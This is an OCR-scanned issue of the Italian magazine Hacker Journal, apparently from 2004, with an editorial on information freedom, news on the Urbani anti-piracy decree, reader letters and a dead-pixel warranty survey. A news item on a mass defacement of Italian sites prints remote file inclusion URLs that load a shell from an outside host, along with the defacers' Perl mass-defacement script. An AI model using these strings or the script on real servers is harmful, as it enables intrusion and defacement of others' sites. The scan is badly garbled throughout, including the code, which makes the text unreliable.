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"Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione e come espandere 
le loro capacità, a differenza di molti utenti, che preferiscono imparare solamente il minimo necessario." 
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Informaz ione libera 

"[...] per quanto riguardo il campo Informatica & Hacking, la globalizzazione non può che 
essere un bene. Internet è un chiaro esempio di globalizzazione. Il fenomeno OpenSource 
è globalizzazione. 

La globalizzazione, dunque, è positiva e sicuramente non opprime [...] la "curiosità". Così come 
il capitalismo non la opprime. [...] ; 

Non è la curiosità che rischia di essere oppressa, lo spirito smanettone dell'Hacker ri- 
marrà sempre tale. 

È un altro valore dell'Hacking che trova molti ostacoli. 

Trattasi di quello che viene definito dagli Hackers storici 'Tutta l'informazione deve essere libera'. 

'Tutta l'informazione deve essere libera. Ogni controllo proprietario su di essa è negativo. La 
condivisione delle informazioni è un bene potente e positivo per la crescita della democrazia, con- 
tro l'egemonia, il controllo politico delle élite e degli imperativi tecnocratici. Dovere etico degli 
hacker è la condivisione del proprio sapere ed esperienza con la comunità d'appartenenza (co- 
munità di pari), separata dal resto della società. Dominano fedeltà, 
lealtà, supporto reciproco, aspettative di condotta normativa: pro- 
prio perché in una comunità virtuale come questa non ci si può 
né vedere né sentire la fiducia reciproca è un valore ancora 
più prezioso. 

Inoltre, nelle comunità informatiche, il tutto è più grande del- 
la somma delle parti quando si tratta di condividere le infor- 
mazioni: ci si scambiano account, si copiano le ultime versio- 
ni del software e chi ha una maggiore conoscenza la condivi- 
de con chi non ne ha altrettanta [...] senza che gli autori si a- 
spettino qualcosa in cambio. 

Nell'underground tutto circola liberamente e rapidamente, sia 
che si tratti di materiale coperto da copyright o meno: il copyri- 
ght è infatti un concetto ormai superato nella futura società del- 
l'informazione per questa ideologia. In questo modo gli hacker han- 
no costruito volontariamente un sistema privato di educazione che li 
impegna, li socializza modellando il loro pensiero: tale processo di ap- 
prendimento all"arte dell'hackeraggio' (Sterling, 1992) per il neofita si 
modella sull'esempio delle società iniziatiche, di cui si dirà in seguito. 
L'hackeraggio per esplorazione e divertimento è, secondo questa politica, e- 
ticamente corretto, finché non siano commessi intenzionalmente furti, atti di 
vandalismo, distruzione di privacy, danno ai sistemi informatici: è contro l'etica alterare i dati che 
non siano quelli necessari per eliminare le proprie tracce, evitando così d'essere identificati. ' (da 
un post di DaMe'sul forum HANC, ispirato a sua volta a testi celebri). 

Ciò in cui questo principio trova ostacoli è, ad esempio, la normativa EUCD (che in America 
trova corrispondenza con la DMCA). 'L'EUCD prevede delle sanzioni per chi aggira le "misure tec- 
nologiche" [. . .] che servono a regolare l'utilizzo e a impedire un uso non autorizzato del materia- 
le digitale coperto da diritti d'autore. [. . .]' (Hacker Journal n.28 pag. 10 "EUCDL: la fine della libertà, 
di DaMe')". 

— Da un post di Milo sui forum di Hacker Journal 

Citazioni, citazioni di citazioni e ancora peggio, ma Milo diceva cose troppo giuste per 
non farle leggere anche qui. L'informazione dev'essere libera. A una pagina da qui ci sono 
le ultime notizie sul decreto Urbani e siamo solo contenti che un po' di spirito hacker co- 
minci a soffiare tra i nostri patatoni parlamentari. 

Qualche pagina più in là un articolo senza peli sulla lingua sul comportamento poco cor- 
retto di alcuni produttori di hardware, ma tra le riviste di settore lo spirito hacker soffia an- 
cora troppo poco. 

TheGuilty@hackerjournal.it 



HACKER JOURNAL: INTASATE LE NOSTRE CASELLE 



Ormai sapete dove e come trovarci, appena possiamo rispondiamo a tutti, 
anche a quelli incazzati, redazione@hackerjournal.it 



Decreto Urbani 




NEWS 
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Cancellate le sanzioni! 



Un'associazione, che nel 
momento in cui scriviamo 
questa news non è stata 
nominata, ha denunciato alla 
Commissione europea il 
decreto Urbani riguardante 
la pirateria cinematografica e lo scam- 
bio di dati p2p. La denuncia dice che il 
decreto viola la direttiva 98/34 sulla tra- 
sparenza e, se così fosse, l'Italia sareb- 
be passibile di multa, oltre a dover ritira- 
re il decreto che diverrebbe automatica- 
mente inapplicabile. Una mossa che se 
va in porto, assesterà un bel colpo nello 
stomaco delle multinazionali della cine- 
matografia. Un successo darebbe al 
popolo della rete anche un'altra signifi- 
cativa vittoria di libertà digitale. 

Ma già da qualche giorno si annuncia- 
vano i primi cedimenti. Lo stesso mini- 




stro ha chiesto 
formalmente, ai 
deputati della 
Commissione 
cultura, di abolire 
la parte del suo 
decreto che 
riguarda i privati: 
niente più 1.500 
Euro di multa, 
niente confisca 
del Pc e niente antipatica pubblicazione 
del nome sui giornali specializzati. Que- 
sta decisione del Ministro ha convinto 
l'opposizione a ritirare una mozione con 
cui chiedeva alla Camera di respingere il 
Decreto perché non conforme alla costi- 
tuzione. Ma la questione è e rimane 
comunque un'altra: gli interessi delle case 
cinematografiche e discografiche, che 
stanno agitandosi con metodi e misure 



completamente obsolete. Come se i sel- 
lai, a fronte della scomparsa del cavallo 
come mezzo di trasporto, si lanciassero 
in campagne contro l'automobile, appog- 
giati dal governo locale. 
Forse sarebbe più intelligente pensare 
di rendere le automobili più comode, ven- 
dendo sedili in pelle, o chissà cos'altro 
che invogli i consumatori verso l'acqui- 
sto di altri servizi, resi possibili dai nuo- 
vi mezzi di comunicazione. Non si sono 
ancora resi conto, chi fa le leggi e chi le 
appoggia per interesse, che la rete è un 
fenomeno senza ritorno: ma forse non 
sanno ancora esattamente quali e quan- 
ti mezzi sono stati messi a disposizione 
da Internet e in quali e quante occasioni 
è ormai utilizzata per fare andare avanti 
la stessa economia delle aziende. D'al- 
tronde in punto di morte è spesso diffici- 
le ragionare lucidamente. 



MA COSTERANNO DI PIÙ I MASTERIZZATORI ! 



brevissimo il testo del decre- il movimento di opinione che in 

ito sarà riformulato e toglie- queste settimane ha sottoposto 

rà le sanzioni a carico degli a severissime critiche l'approva- 

utenti: eccezionale risultato per zione del decre- 



SONY. 



■R8:< 0W+RW4x 




Scertitied forS.x DVD+Rstandard! 



I • ] +VR focmat supporled! 



Write dota tu disti with the suine rase os «samum 
FI 

M LdcD-RW medio! 

|yj|Canbeusdvert!(ally! 



■ liJ Floppy diiks! 

High speed writesjeven lo CD-R and 



to legge, proposto dal ministro ai 
Beni culturali Giuliano Urbani. 
La riscrittura prevede però di 
estendere le sanzioni, che 
comunque rimangono per chiun- 
que aiuti lo scambio a fini com- 
merciali, a tutte le opere protette 
da diritto d'autore, in particolare 
musica ed editoria. Inoltre, pena 
multe che vanno dai 103 ai 
1 0rnila euro, i provider (d'ora in 
poi chiamati "prestatori dei ser- 
vizi della società dell'informazio- 
ne") dovranno riprodurre sulla 
propria home page un banner 
antipirateria. 

Ma la vera sorpresa è l'introdu- 
zione di una tassa del 3% sul 



prezzo di listino dei masterizza- 
tori e del software di masterizza- 
zione. Come avviene già per 
videoregistratori e registratori 
audio. Inoltre non sarà più 
necessario che i provider tenga- 
no i dati delie connessioni più a 
lungo di quanto già previsto dal- 
le attuali normative anche se, su 
richiesta dei cybercop, dovran- 
no fare in modo che l'abbonato 
non possa più proseguire un'at- 
tività che venisse riconosciuta 
illegale. In sostanza le modifiche 
dovrebbero riallineare il decreto 
alle norme europee e riguarderà 
tutte le opere protette dal diritto 
di autore. 



WD/CD ReWritable Drive 
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2.4S9 sili Italiani in un solo giorno, e gualcano ili più... 




Il 4 aprile alle 16.30 un gruppo 
di brasiliani defacer "Infektion 
Group", presenti su irc.brasnet. 
org, ha effettuato un attacco di 
massa sul server webx6.aruba.it 
portando alla chiusura la bellezza 
2.499 siti italiani che su quel server si 
appoggiano. Motivi patriottici o sempli- 
ce divertimento? Comunque un colpo 
andato a segno, le cui conseguenze 
ancora sono visibili su molti dei siti ospi- 
tati da Aruba. Contemporaneamente 
altri siti italiani sono stati defacciati da 
altri gruppi o singoli, con l'imprevedibi- 
le conseguenza che il 4 aprile potreb- 
be diventare una data da cancellare nei 



ricordi della rete italiana, che vedrebbe 
ben oltre 2.500 siti attaccati nello stes- 
so giorno. 

La tecnica che hanno adottato è sta- 
ta di utilizzare una stringa da brow- 
ser per delimitare una situazione di 
injection php sul server e quindi gua- 
dagnare l'accesso come amministra- 
tore, caricando poi uno script che effet- 
tua un mass defacement all'index dei 
siti. Questa tecnica è stata applicata a 
uno dei siti che presentavano la vulne- 
rabilità a un modulo in phpnuke. 
In pratica hanno utilizzato una delle 
seguenti stringhe: 



ujujuj.sito.it/indeH.php?=http://dominus.uJebcinda- 
rio.com/inf, jpgT&cmtì^ 

iuujuj.sito.it//modules/My_.eGallery/public/display- 
Category.php?basepath=http://dominus.iuebcinda- 
rio.com/inf .jpg?GTmd= 

doue: 

ujujui.sito.it = è uno dei possibili siti deboli; 
http://dominus.iiJBbcindario.com/inf.jpg = è lo 
exploit che permette di mostrare la shell di coman- 
do del seruer; 
cmd= è la shell da cui si possono lanciare i comandi. 

Questo uno degli exploit utilizzati dai defacer 
(http://shellcode.ujebcindario.com/nio.pn 

#!/usr/bin/perl 
» print "[] IndenOuer uD.5 [#lnfektion Group 20D41 - 
[by shellcDde]\n"; 
if (@HRGU!=3M 

print "\n Uso: $0 <dir_dos_sites> <arquiuo_procu- 
rado><caminho_nouo_arquiuo>\n"; 

print " Euemplo: $D /home/sites V'indeH.*\" 
/tmp/indeH.html\n\n"; 

die " RTENCRO: Nao esqueca de botar aspas no arqui- 
uo procurado\n\n"; 

} 

print "[*] Hguarde, buscando arquiuos...\n"; 



$cmd="find $HRGU[D] -name \"$HRGU[1]\"I"; 

open(FIND,"$cmd"); 

@lìst=<FIND>; 

$quant=@list; 

die "fri Erro: Nenhum Rrquiuo Encontradn!\n", if 

($quant==D); 

print "[*] $quant arquiuos encontradosW; 

print "[*] Mudando arquiuos.. An » "; 

$1*1; $pct=10; $mult=$i*10D; $mult/ = $quant; 

foreach $local(@list){ 

sgstemC'echo v cat $HRGU[2l x > $local"); 

$pas=$ì*100; $pos/=$quant; 

if ($pos>$pct){ 
print "#"H$mult; 
$pct+=$pct;; 



j 

print "Vnlil Total: $quant arquiuos mudadosAn" 
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Con metodi da provetti hac- 
ker, i cybercop delia Guar- 
dia di Finanza hanno indivi- 
duato un giornalista italia- 
no accusato di diffamazio- 
ne, che aveva installato un 
sito su un server americano (http://tri- 
nity.flexihostings. net/) per poi scriverci 
sopra una serie di pesantissimi pette- 
golezzi, a cui aveva dato il nome com- 
plessivo di svanityfair.com Pur utilizzan- 
do dei proxy di anonimizzazione e pub- 
blicando le proprie pagine in Australia 
non prima di averle reindirizzate da un 
sito americano, gli hacker in divisa lo 
hanno beccato, perquisendogli anche i 
PC e gli hard disk ad essi collegati. 



L'indagine dei cybercop ha usato di tec- 
niche "ibride tra informatica ed ingegne- 
ria sociale" che "hanno consentito di cir- 
coscrivere la zona geografica e succes- 
sivamente tracciare a ritroso il sogget- 
to, che operava con metodi di anonima- 
to ormai noti". 

In sostanza il Nucleo regionale di 
Polizia tributaria della Lombardia ha 
prima identificato le caselle email 
collegate in qualche modo al sito e 
poi ha lanciato uno script che è sta- 
to allegato a delle email civetta, tal- 
mente ben fatte da spingere il manu- 
tentore delle pagine ad aprirle. Come 
tutti noi sappiamo, mai aprire email pro- 



venienti da sconosciuti! L'amo si è subi- 
to attivato e ha cominciato a mandare 
agli investigatori tutti i dati possibili e 
immaginabili sul computer che aveva 
ricevuto l'email "infetta". 
Il fatto che il sito fosse all'estero non 
solleva il proprietario dalle sue respon- 
sabilità, e adesso dovrà affrontare un 
processo penale per diffamazione. In 
una intervista a http://news2000.libero.it 
dell'anno scorso aveva dichiarato "Ti do 
un' anteprima: usciranno delle edizioni 
periferiche. Ci hanno proposto di fare 
degli Svanityfair locali, cioè in alcune 
città e regioni ci saranno delle pagine 
dedicate al gossip di ogni provincia". 
Non pensiamo che avranno seguito... 



This Account Has Been Suspended 



Please contact the billing/support department as soon as possible. 



A Ecco il triste auuisa che appare 
oggi, se si cerca suanitgfair.com: 
ii sito americano è stato chiusa 
per interessamento dei la nostra 
ambasciata negli US fi, 
che ha trasmesso i dati della nostra 
magistratura a quella americana. 
Non e stato messo però sotto 
sequestro dalla magistratura, 
ma chiuso dal prouider 
su propria inizia ti uà. 




< Lei l 'a uè uà 

già detto: 

senza tante 

indagini, 

aueua pubblicato 

il nome del sua 

diffamatore. 

http: //ujujuj. 

seluaggialucarelli.it 

/diario/inden. asp 
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Saluto con vero entu- 
siasmo la nascita del- 
l'ultima "sorella" 
WEBMASTER JOUR- 
NAL... Ora siete per- 
fetti! Continuate così. 
Saluti a tutti. 

(Francesco) 



V, 



IN SITO ^**W ATTENTI 

ricco di foto ^W Al colori 
in meno ■ ; ^S! 

di mezz ora 



HOSTING vij 



Grazie! 



I 



nuora ubero? 

Potreste darmi delucidazioni sulla 
vostra news apparsa a pag. 7 del 
numero 47...? Prima di spararle cosi 
grosse potreste almeno linkare la 
news con qualke link di riferimento, 
btw mi sto riferendo a quella sul p2p 
libero... 
Grazie... 

(bullet) 

Volentieri, ti diamo delucidazioni! 
Comprendiamo anche le tue per- 
plessità, perché sembra in totale 
contrasto con la bufera scatenata 
dall'italianissimo decreto Urbani, 
ma... è ora di non fare un fascio 
unico solo per essere 'contro ' qual- 
cosa. 

Perché un conto è la pirateria a fini 
commerciali, ovvero qualunque 
sistema illecito per fregare l'altrui 



ANTENNE WIRELESS 



diritto a lavorare e guadagnare 
sfruttando le proprie capacità e 
possibilità, diritto che in una libera 
democrazia è ancora tra quelli fon- 
damentali, per fortuna. Un conto, 
invece, è chi 'in buona fede' e solo 
per fini personali compie qualcosa 
che potrebbe anche configurarsi un 
illecito in sé, ma di fatto nella 
situazione in cui ci si trova è giu- 
stificabile e non danneggia alcun- 
ché. Ed è esattamente il principio 
sancito dall' Europarla- mento, la 
cui decisione la puoi trovare tra i 
documenti ufficiali del 9 marzo 
2004 e il cui commento a spiega- 
zione lo puoi trovare sempre all'in- 
dirizzo http://www. europarl.eu. 
int/home/default_it. htm 

(Servizio Stampa). 

Peraltro siamo in buona compagnia, 
visto che la stessa notizia è stata 
riportata anche dai maggiori quoti- 
diani italiani, con lo stesso taglio e 
lo stesso senso (htìp://www. repub- 
blica. it/2003/g/sezioni/scienza_e_te 
cnologia/p2p/laue/laue.html). 
Ecco, comunque, cosa dice la 
Comunità Europea (abbiamo taglia- 
to il pezzo essenziale): "Con 330 
voti favorevoli, 151 contrari e 39 
astensioni, il Parlamento europeo 
ha adottato la relazione di Janelly 
FOURTOU (PPE/DE, F) sulla tutela 
dei diritti di proprietà intellettuale 
[...]. Riguardo al campo d'applica- 



dolevo segnalarvi, visto anche l'articolo che avete pubblicato sulla 
costruzione di una antenna wireless, questo gruppo che ho fondato 
http://it.groups. yahoo.com/group/retjwireless/. Siamo un centinaio, ma per 
realizzare una rete wireless a livello nazionale siamo ancora pochi, se potete 
farlo conoscere ai vostri lettori forse questo sogno di una rete libera a tutti, 
anche dai provider si potrà realizzare veramente. Saluti e complimenti ancora! 

. (Luca Rozza) 



zione della direttiva, il Parlamento 
ritiene che le misure da essa previ- 
ste debbano essere applicate unica- 
mente agli atti commessi «su scala 
commerciale», ferma restando la 
possibilità degli Stati membri di 
applicarle anche nei confronti di 
altri atti, compresi quelli configura- 
bili come concorrenza sleale o atti- 
vità simili. Ciò significa che gli atti 
commessi in buona fede dai consu- 
matori - come lo scaricare musica 
da Internet ad uso personale - non 
saranno perseguibili." 



UN PO' DI SEGNALAZIONI 

- // link a ResourceHacker pubblicato 
nel n. 45 non esiste più (http://www. 
rpi.net.au/%7Eajohnson/resource- 
hacker/). Ve ne indico unY altro: 
http://www. mondoirc. net/ creare/ prò 
grams/Resource%20Hacker%203.4.zip 

- in http://www.2powerful.com/file- 
vari/kill.exe trovate una utility in 
grado di killare i processi. Può sem- 
brare una stronzata perche per Win 
c\'è Taskmgr, però... 

- nel n. 47 avete spiegato come crea 
unY icona showdesktop ma non 
come metterla nella barra delle 
applicazioni. . . E poi bastava fare: 

I. tasto destro del mouse sulla barra 
e c'è la voce apposta 

II. tasto destro sulla barra -> pro- 
prietà -> mostra avvio veloce... 

- ottima la promozione di Lyx: sono 
pagine spese bene 

(Opt) 

Grazie Opt. 

Teniamo conto di tutto e valutiamo: 
ricevendo una quantità di email 
impressionante e un'altrettanto 
allucinante numero di visite al sito, 
possiamo approfondire abbastanza 
bene 3 desideri di tutti quanti. 
I trucchetti e i consigli che trovia- 



(p6) (www.hackerjournal.it» 



mo sulla rivista non sempre neces- 
sariamente sono MI metodo più 
veloce per fare una cosa', ma 
molto spesso sono 'un metodo inu- 
suale per fare una cosa', anche se 
può sembrare scontata. Perché ci 
divertiamo a curiosare e tentare 
strade alternative, sempre. Siamo 
d'accordo con te che quando par- 
liamo di Lyx abbiamo speso bene il 
nostro tempo. Ciao! 



DUE RISATE 



Ho trovato due indirizzi che met- 
tono a confronto Windows e 
linux: andate prima qui, 
http://www.microsoft.com/italy/msc 
orp/facts/default.mspx e poi fate un 
salto qui: http://www.suse. de/it/pri- 
vate/products/suse_linux/i386/win- 
price.html ...costi minori???? Ok, 
winzoz ha tanto in meno ma non mi 
era mai sembrato che questo si tra- 
ducesse in costi minori... :-)" 

(Luca Fulchir) 



Microsoft 

About Microsoft 



Da una recente ricerca è emerso che usare Linux è 10 
volte più costoso di Windows Server 2003. Lo studio, 
certificato dalla società di ricerca indipendente META 
Group; ha misurato i costi di gestione di Linux su un 
mainframe IBM z900 comparandoli ai costi di gestione di 
Windows Server 2003 su processori Intel Xeon 900 MHz per le 
funzioni di File Serving e Web Serving. I risultati hanno 
mostrato che il mainframe IBM z900 con Linux, se 
paragonato a Windows Server 2003 come piattaforma 
per server consolidation, ottiene performance inferiori 
a costì superiori. Casi di successo nell'industria,, rapporti di 
analisti di business e risultati di test di laboratorio forniscono 
una valutazione dei vantaggi offerti dalla piattaforma Microsoft 
Windows. In questa area sono riportati i dati essenziali che vi 
consentiranno di operare una scelta tra Windows e Linux, 



Costi operativi del server WinTel IO 
_mj_|_;jj] volte inferiori rispetto ai mainframe 
Linux 



Sistema 

operativo: 



Prezzo 
complessivo: 



SUSE LINUX 
Professional 3.0 
Pacchetto 
completo 



Windows XP 
Professional 
con corredo di 
software 
paragonabile 
*Prezzo di 
mercato IVA 
Ine*. 



EUR 5.954,44 







cominciareHH 

Ciao! Vorrei chiedervi un consiglio. 
Ho deciso (finalmente) di voler 
cominciare a vedere come è fatto 
Linux. Ho già la possibilità di utiliz- 
zare un dei miei due hard disk per 
installarci esclusivamente il 
Pinguino, ma ora non vorrei rissa- 
re... Dovete sapere che manterrò 
ugualmente la mia installazione di 
Windows XP e, per evitare kasini con 
il boot (vorrei evitare il riskio ke non 
mi parta più uno dei due OS, almeno 




fino a quando non mi sarò fatto le 
ossa su Linux!), vorrei trovare un'al- 
ternativa. Girando su internet ho tro- 
vato una distribuzione di Linux che 
si avvia direttamente da Windows. E' 
Win Linux 2003 (www.winlinux.net). 
Me la consigliate per cominciare a 
lavorare su Linux? Oppure è meglio 
proseguire per la strada classica (il 
dual boot)? Attendo il vostro parere 
e vi ringrazio per l'aiuto, 

(Domenico) 

Ciao Domenico! 

Bravissimo, un buon inizio. Ma 
prova prima anche qualche distribu- 
zione come Knoppix (www.knop- 
pix.org) che, essendo un Live CD, ti 
consente di lasciare assolutamente 
inalterato il tuo hard disk e permet- 
te di fare partire Linux direttamente 
da CD. Oppure trovi sul CD di 
Hackers Magazine di questo mese 
una distribuzione minima, ma 
anch'essa Live CD, che si chiama 



LNX-BBC. 
Knoppix occu- 
pa un CD comple- 
to, ma contiene anche un sacco di 
applicativi utili e interessanti. 



■n'iiiiMiiiiiiihnf 

WWW.DXTUNERS.COM 

Gentile redazione di HJ vorrei chie- 
dervi una informazione; nel 46 di HJ 
a pag 23 c'era un servizio sui radio 
scanner via internet, nell'articolo c'è 
una foto di (credo) uno scanner o 
cmq una radio, nella foto si riesce a 
leggere javaradio, è possibile sapere 
di che programma si tratti e dove 
poterlo trovare? 

(Cogurt) 



Ecco il nuovo indirizzo di javoradio 
(con la "o", non con la "a"): 
www.dxtuners.com. Il sito è stato 
completamente rinnovato. Non si 
tratta di un programma, ma di un 
sintonizzatore direttamente utiliz- 
zabile da Web. Un programma, 
invece, è scaricabile se vogliamo 
diventare noi dei nodi di ascolto e 
quindi dotarci di un sintonizzatore 
adatto e interfacciabile ai nostro PC 
sotto Linux, che deve essere sem- 
pre connesso alla rete. 
Buon divertimento! 







<#* 



■ FINE DEL CONTOBLTTO 
Al 16ENNI 

Per quest'anno 
basta contributo 
statale ai ragazzi 
che acquistano un 

PC. Il 30 marzo è 
infatti scaduto il ter- 
mine di presentazio- 
ne, da parte dei 
rivenditori, dei nomi- 
nativi che acquistan- 
do un PC avevano 
diritto a uno sconto di 165 Euro, contri- 
buto offerto dal governo per diffondere 
tra i ragazzi la cultura informatica. 
Peccato, proprio ora che finiscono le 
scuole e i genitori, i nonni, gli zìi e i paren- 
ti tutti sono più propensi al regalo, non è 
più possibile risparmiare qualche Euro. 
Attenderemo il prossimo stanziamento, 
che speriamo arrivi presto. 

■ PATENTINO 
CICLOMOTORI ONLINE 

Solo perché ci possiamo esercitare, 
ma si trova all'indirizzo http://www. 
poliziadistato.it/pds/stradale/patenti- 
no/via.htm tutto quello che serve per 
prendere confidenza con l'esame che 
dovremo sostenere dal primo luglio del 
2004, momento in cui dovremo posse- 
dere un patentino anche se guidiamo 
solamente ciclomotori. 
E' una presentazione un po' lenta e non 
particolarmente vivace, ma contiene un 
sacco di consigli effettivamente utili. 
Non guardiamola con pregiudizio; vale 
la pena essere preparati quando di mez- 
zo c'è la propria sicurezza o la respon- 
sabilità altrui, per esempio dei genitori, 
sui nostri comportamenti! 




O CATTURATO MONITORANDO MILIARDI DI EMAIL □ 






Conosciuto come Mudhen, è sta- 
to arrestato dalla Agenzia per la 
sicurezza nazionale americana, NSA, 
dopo essersi vantato, pare, di essere 
riuscito a disabilitare un satellite cine- 
se con il semplice aiuto di un cellulare 
e del suo fido notebook. Vero o non 
vero, l'uomo aveva lavorato anche negli 
uffici di Fort Meade della stessa NSA 
su progetti segreti di crittografia e teo- 
ria del caos. Fonti non confermate dico- 
no che agli arresti sono finite anche 
una decina di altre persone in tutto il 
mondo, alcune con accuse di terrori- 
smo, dopo che normali email circolan- 
ti in rete sono state monitorate dai 

O 14SORPASSOMETRI 

Ecco la cartina con i 14 sorpas- 
sometri monitorati da un soft- 
ware grafico in grado di stabilire in 
modo automatico se abbiamo effet- 



potentissimi sistemi di Fort Made. In 
questi arresti alcuni vedono conferma- 
to i! sospetto che i servizi americani 
stiano effettivamente monitorando 
miliardi di normali messaggi email, par- 
ticolarmente quelli da e per l'estero. 
Nessuno lo ammette, nessuno lo nega. 




□ 



— ________ ________ 

namics Intelligent Scene Analysis System 






► _~ 


„„| _ 



tuato un 
sorpasso 
azzardato, 
pericoloso 
o decisa- 
mente vie- 
tato. 

Alle porte di 
Roma un 
centro di 
controllo 
della Polizia 

di Stato verifica questi 14 punti delle 
strade italiane per tutte le 24 ore. Sia- 
mo avvertiti e quando si è avvertiti si 
è mezzi salvati. Mettiamoci del nostro 
per l'altra metà. 




O MICROSOFT CI RIN-TRACCERA 



^identificazione a 
radiofrequenza è il 
nuovo salto tecnologi- 
co che cambierà la 
nostra vita, ne siamo 
certi. In meglio o in peg- 
gio, questo è ancora tut- 
to da stabilire. Andremo 



■it'.'.'m 


fW 




1 ^^r 
\ _r 






::;: 


ili 



senza passare dalle code \V . 
alle casse, questo è sicu- 
ro. Ma dietro quei tornelli 
che girando ci addebiteranno in un botto 
tutta la spesa direttamente sulla carta di 
credito, grazie alle etichette a emissione 
radio, c'è già Microsoft che ci strizza l'oc- 
chiolino. È di questi giorni l'annuncio che 
intorno a un tavolo istituito da Microsoft si 
sono sedute le principali multinazionali 



che credono pienamente 
nel RFID e stiamo sicuri 
che ne vedremo d'ogni 
tipo. È già in circolazione 
l'idea che ci si potrà avvi- 
cinare alla confezione di 
un prodotto con il proprio 
cellulare e su questo 
vedere la comparazione 
dei prezzi rispetto ad altri 
prodotti simili. Tecnica- 
- mente già fattibile, tecno- 
logicamente interessante, 
saremo circondati da oggetti che, per così 
dire, parleranno da sé. Fino a che lo diven- 
teremo per forza di cose anche noi, coper- 
ti come saremo, attaccate fin nei calzini, 
da etichette a emissione di radiofrequen- 
za, capaci di trasformarci in specie di 
radiofari ambulanti. 
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O E MORTO LO SPAM, ABBASSO LO SPIM \J 




Secondo gli istituti di ricer- 
ca i messaggi pubblicitari 
indesiderati cacciati dalla por- 
ta (l'email) rientreranno dalla 
finestra: i sistemi di chat e mes- 
saggistica. Per la nuova tenden- 
za è già stato coniato il nome di 
spim e si fanno già previsioni 
catastrofiche: per Radicati Group 
(http://www.radicati.com) nel 
2003 sono volati 400 milioni di 
messaggi-spazzatura e nel 2004 
la cifra sarà di un miliardo e mez- 
zo.Se ci arriva un ICQ pubblicita- 
rio lamentiamoci ma non troppo: 
siamo in numerosa compagnia. 



3 BLOCCATO IL METADONE PER APPLE 



olti forum ne avevano fatto un 
cavallo di battaglia, offrendo la 
notizia come la soluzione ai droga- 
ti di iPod, il lettore di musica digitale 
targato Apple, che sta riscuotendo un 
successo enorme. La notizia riguarda- 
va un software in grado di riprodurre 
un iPod, anche graficamente, sullo 
schermo di un PocketPC. 20 dollari o 
pochi Euro di meno e si poteva instal- 
lare l'emulatore direttamente sul pro- 
prio palmare Windows. 
Ma Apple non si è fatta attendere e ha 
imposto la chiusura del sito e il ritiro 
del programma dalla rete. Fine della 
possibilità di sostituire alla droga iPod 
il metadone software. Apple 1 - libertà 
in Rete 0. 



^■■HP 
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Jluoua Password! 



Ecco i codici per accedere alla Secret Zone 
del nostro sito, dove troveremo arretrati, 
sfondi, informazioni e approfondimenti in- 
teressanti. Con alcuni browser, può capita- 
re di dover inserire due volte i codici. 
Non fermiamoci al primo tentativo! 



USER: RESU 
PASS: SSAP 



■ NIENTE LONGHORN 
PER QUEST'ANNO 

Microsoft sta preparando la riuova 
versione di Windows, nome in 
codice Longhorn, e ci sta mettendo un 
tempo infinito. Gli esperti dicono che 
arriverà addirittura per il 2006 se non 
ancora più tardi. Nel frattempo l'azien- 
da ha annunciato che la versione pub- 
blica preliminare di test, prevista per 
questa estate, ritarderà forse anche al 
2005. Insomma, c'è ancora tempo per 
godersi tutti i virus e i buchi dell'attua- 
le Windows. 
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Compriamo un notebook, 

o un monitor LCD nuovo 

ma c'è gualche pixel che 

non funziona. 

Ci aspettiamo 

che ce lo riparino 

o che lo sostituiscano... 

E invece NIENTE! 

Non facciamoci 
fregare! 



bbiamo acquistato, dopo 
mesi di risparmi, il nostro 
nuovo notebook o un nuo- 
vo monitor LCD per sosti- 
tuire l'ingombrante CRT. 
Corriamo a casa, spacchettia- 
mo con un fremito il nuovo giocattolo e 
lo accendiamo... ARGHI C'è un pixel 
che non funziona! Sconsolati, ma anco- 
ra convinti che si tratta di un contrattem- 
po torniamo dal negoziante e chiedia- 
mo la sostituzione del prodotto. Sorpre- 
sa! Non ce lo cambiano! Eh si, perché le 
case lo considerano comunque funzio- 
nate. Merda! Ma la garanzia? Non può 
essere! L'abbiamo pagato tanto quanto 
uno sano! Non è giusto! Vediamo che 
^ziende si comportano bene rispetto 
ai pixel bruciati sui nostri schermi, 
\ chi si comporta male e cosa possia- 
J: mo fare. Per avere un link diretto alle 
regole di ciascun costruttore, li tro- 
viamo su http://www.overam.com/lap- 
top_dead_pixels.htm. 

Rcer: cattivella 

Quattro pixel sono un valore vagamente 

accettabile. 

Occhio di pernice. 

Hpple: cattiva (fuori) 
Apple richiede ben sei pixel bruciati oppu- 
re due pixel bruciati adiacenti o molto 
vicini tra loro. Tuttavia, se il cliente si 
arrabbia, come è giusto, spesso si vede 
effettuare comunque la sostituzione. 
Giudizio: Occhio di bue. 



CTK: buona 

CTX offre 101 giorni di garanzia a pixel 

zero. Bravi. 

Giudizio: Occhio di lince. 



Dell: cattiva 

Vedasi Apple. Oltretutto vendono on-line, 
dovrebbero poter controllare meglio, Sei 
pixel sono un valore esagerato. 



TORTO RAGIONE 

C5 è un motivo a giustificazione del com- 
portamento quasi inspiegabile delle 
aziende che abbiamo citato: quando uno 
o più pixel sono danneggiati la riparazione 
è quasi impossibile o economicamente 
sconveniente e il pezzo va buttato. Possia- 
mo quindi in parte capire l'atteggiamento 
delle case, ma c'è una considerazione da 
fare: perché i monitor con pixel bruciati ven- 
gono venduti allo stesso costo di quelli sani? 
Non ci si potrebbe accordare per un tot di 
euro di sconto per ogni pixel bruciato? 



Giudizio: Occhio di bue. 

Hewlett-Packard (Compaq): cattiva 
Cinque pixel bruciati sono troppi, checché 
dica lo standard. 
Giudizio: Occhio di bue. 



»jiM»imani 



_.ede: otto pixel bruciati prim 
di cambiare l'apparecchio. Meglio accer 
derlo prima di comprare. 



Giudizio: 



LG: buonina 

Pare che bastino tre pixel a fare cambia- 
re uno schermo difettoso e sarebbe una 
bella notizia. 
Giudizio: Occhio di pernice. 



sono arrivare fin 
* , i accettare la 
""he tenerseli. 



Giudizio: 



Olidata: buona 
In Olidata rispettano rigorosamente lo 
standard, al punto che sul loro sito si tro- 
vano tutte le tabelle relative allo standard 
di valutazione ISO. Eccellente. 
Giodizìo: Occhio di falco. 
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Panasonic: cattiva 

È una delle poche aziende a fornire indica- 
zioni chiare, ma sempre cinque pixel sono. 
Giudìzio: Occhio di bue. 

Philips: non pervenuto 

Non siamo riusciti a ricavare un valore 

per quanto riguarda Philips e questo la 

dice lunga sulla chiarezza delle polìtiche 

aziendali in merito. 

Siudìzioi Occhio a quello che dicono. 

Samsung: cattiva 

Tre anni di garanzia vanno bene, ma cin- 
que pixel no. 
Giudizio: Occhio di. bue. 

Sony: cattiva, in Italia 
In Australia e negli Stati Uniti Sony 
dichiara una policy di zero dead pixel: 
se c'è un pixel difettoso, si cambia il pro- 
dotto. Invece, in Italia cos'i come in tutta 
